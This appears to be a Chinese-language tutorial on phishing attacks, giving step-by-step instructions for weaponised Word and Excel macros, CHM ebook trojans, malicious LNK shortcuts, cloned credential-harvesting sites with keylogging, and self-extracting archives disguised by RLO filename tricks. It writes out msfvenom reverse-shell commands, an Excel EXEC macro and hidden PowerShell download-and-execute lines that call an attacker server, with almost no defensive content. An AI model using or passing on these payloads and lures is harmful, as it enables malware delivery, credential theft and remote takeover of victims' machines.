钓鱼的多种方式
office钓鱼攻击
宏与宏病毒
# 宏
宏是office自带的一种高级脚本特性,通过VBA代码,可以在office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中一些任务自动化
# 宏病毒
宏病毒是一种寄存在文档或模板的宏中的计算机病毒,打开这中文档,其中的宏就会被执行,宏病毒被激活,转移到计算机上
docx钓鱼攻击
# word远程模板执行宏
利用word文档加载附加模板是的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏
# 攻击方法
1,创建两个不同的文件,第一个是启用宏的模板,或是.dotm文件,他将包含恶意VBA宏。
2,创建第一个文件,不包含恶意代码,但是有指向恶意模板文件的目标链接,即指向创建的第一个文件的链接
实践操作
- 利用msf生成宏病毒
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.110.131 LPORT=4444 -e x86/shikata-ga_nai -i 10 -f vba-exe //会生成两端代码,macro的写在宏代码中 payload的写在word文档中
- 创建一个word注入宏
创建word(.docm后缀的文件)-点击工具-宏编辑器
- 将msf生成的宏(第一段代码 macro)插入代码中,保存并关闭
- 将生成的payload复制到文档中
- msf端使用监听ip以及端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.110.131
set LPORT 4444
run
打开docm文件,并且启用宏s
之后会弹出meterfer的shell
excel 宏
当把恶意的宏代码嵌入excel中,用户打开excel文件里的宏就会被触发
#攻击方法
1,使用msf生成hack.msi放到远程的服务器上
2,使用excel插入宏
3,将插入的宏隐藏
实践操作
- msf生成excel宏
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.131 LPORT=4444 -f msi -o hack.msi
- 打开一个excel,右键点击sheet表格-插入-点击宏代码-在新建的宏表中插入宏代码
=EXEC("msiexec /q /i http://192.168.110.131:8000/hack.msi") //调用执行服务器上的dayu.msi文件
=HALT() //标识Excel 4.0宏结束,类似C语言return指令
//http://192.168.110.131:8000/hack.msi可以在vps中使用python -m http.server搭建一个网站
- 将单元格设置为Auto_open
- 将宏表进行隐藏
- 保存为xslm文件
- 受害主机点击此文件之后msf端会看到反弹的shell
CHM电子书钓鱼
# CHM 已编译的帮助文件
html文件格式被压缩和重整以后,就被制成了这种二进制的。chm扩展文件格式。
.chm文件格式由压缩的html文件、图像、javascript这些文件组合而成,同时,他可能还带有超链接目录、索引以及全文检索功能。
# 电子书木马钓鱼优点
1.因为电子书一般是在本地电脑域打开的,所以获得的权限也是本地电脑域的权限
2。由于木马镶嵌再电子书中,所以一般的杀毒软件无法对其中存在的木马病毒进行检查和清除
# 攻击方法
1,编写恶意代码,制作钓鱼文件(可使用MyJSRat工具)
2,将恶意代码放在服务器上并且监听
3,制作带恶意代码的chm电子书(可使用Easy CHM)
lnk快捷方式钓鱼
# lnk文件
用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常他以快捷方式放在硬盘上,方便使用者快速的调用
# 攻击方法
1,使用cs进行web投递生成a脚本http://192.168.110.131:80/a
2.在桌面右键创建快捷方式
目标填写payload(例如:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.110.131:80/a')"
cs生成payload:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.110.131:80/a'))"
3.为了让快捷方式伪装的像诱导文件,可以选择更改图标,并且更改文件名
实践操作
- 使用cs生成一段ps脚本,意思为远程下载脚本并运行。主机访问后能直接运行,自动下载payload并上线
- 创建快捷方式
- 填写payload并保存为pdf
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.110.131:80/a')"
cs生成的payload为
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.110.131:80/a'))"
填写的payload最好知名powershell的存在位置
- 右键属性修改图标,图标文件可在**%SystemRoot%\System32\SHELL32.dll**中寻找
- 点击文件之后上线成功
克隆网站钓鱼
克隆网站主要模仿相关网页的页面格式,与原网站类似,且域名相差不大,看到类似的网站一般情况下都会输入账号和密码,同时诱导受害人下载恶意文件,也可以劫持网页,记录键盘输入等操作
# 攻击方法
利用cs克隆网站
# 说明
有些网站可以克隆成功,但是不能得到用户输入的数据
实践操作
- 使用cs克隆想要盗取的网站
- 输入要克隆的网站,记得勾选在克隆的站点启用键盘记录
- 访问生成的网站,并输入用户名密码
- 在cs的视图-web日志可以看到网站的访问情况和输入的用户名和密码
自解压捆绑钓鱼
使用winrar将可执行文件和图片捆绑在一起并添加到压缩文件,创建自解压格式并设置解压后运行,在模式中选择隐藏
实践操作
- 使用cs生成木马,并且将这个木马和图片放在一个文件夹中,选中这两个,右键添加到压缩文件
- 进行自解压
- 来到高级选项-自解压选项-修改解压路径
- 在高级解压选项的设置中选择解压后运行,并设置木马的路径和图片路径(图片名最好简单一点 不要有空格 像我下面图片这样命名最后就解析失败了)
- 在高级解压选项的模式中选择全部隐藏
- 在高级解压选项的更新中选择以下选项
- 将可执行文件的图标改为一张图片(需要将图片转为图标,后缀为.ico可利用在线网站),在高级解压选项的文本和图标中选择以下选项
- 生成可执行文件
-
运行执行文件会弹出图片
-
查看cs上线成功
ets%2Fimage-20240821111536856.png&pos_id=img-wKkexOJ9-1724221495137)
- 如果想要更逼真一点可以使用RLO
1.右键.exe文件重命名
2,重命名时再右键插入RLO
4,想要什么后缀,就将后缀名倒着写即可,例如word就是drow,png就是gnp
- 改名后再次点击,仍然上线成功
